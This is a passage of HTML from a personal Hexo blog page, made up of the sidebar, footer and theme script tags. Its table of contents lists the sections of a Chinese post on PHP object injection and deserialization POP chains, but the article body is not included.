      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="Set3rnal" />
            
              <p class="site-author-name" itemprop="name">Set3rnal</p>
              <p class="site-description motion-element" itemprop="description">勿忘初心</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/mrupdate" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://zhangmenrenhh@gmail.com" target="_blank" title="E-Mail">
                    
                      <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://weibo.com/3517137212" target="_blank" title="Weibo">
                    
                      <i class="fa fa-fw fa-weibo"></i>Weibo</a>
                </span>
              
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-序列化与反序列化简介"><span class="nav-number">1.</span> <span class="nav-text">0x00 序列化与反序列化简介</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#反序列举例"><span class="nav-number">1.1.</span> <span class="nav-text">反序列举例</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP类和对象"><span class="nav-number">1.2.</span> <span class="nav-text">PHP类和对象</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#魔术方法"><span class="nav-number">1.2.1.</span> <span class="nav-text">魔术方法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-PHP对象注入"><span class="nav-number">2.</span> <span class="nav-text">0x01 PHP对象注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-destruct"><span class="nav-number">2.1.</span> <span class="nav-text">1.__destruct()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-toString"><span class="nav-number">2.2.</span> <span class="nav-text">2.__toString()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-再介绍一下-wakeup漏洞"><span class="nav-number">2.3.</span> <span class="nav-text">3.再介绍一下__wakeup漏洞</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-反序列化之-pop链"><span class="nav-number">3.</span> <span class="nav-text">0x02 反序列化之 pop链</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2016 &mdash; <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heartbeat"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Set3rnal</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.3</div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  

    
      <script id="dsq-count-scr" src="https://0xsisrazz.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://www.set3rnal.xyz/2016/12/06/php对象注入小结/';
          this.page.identifier = '2016/12/06/php对象注入小结/';
          this.page.title = 'php对象注入';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://0xsisrazz.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  














  





  

  

  
  

  

  

  

</body>
</html>
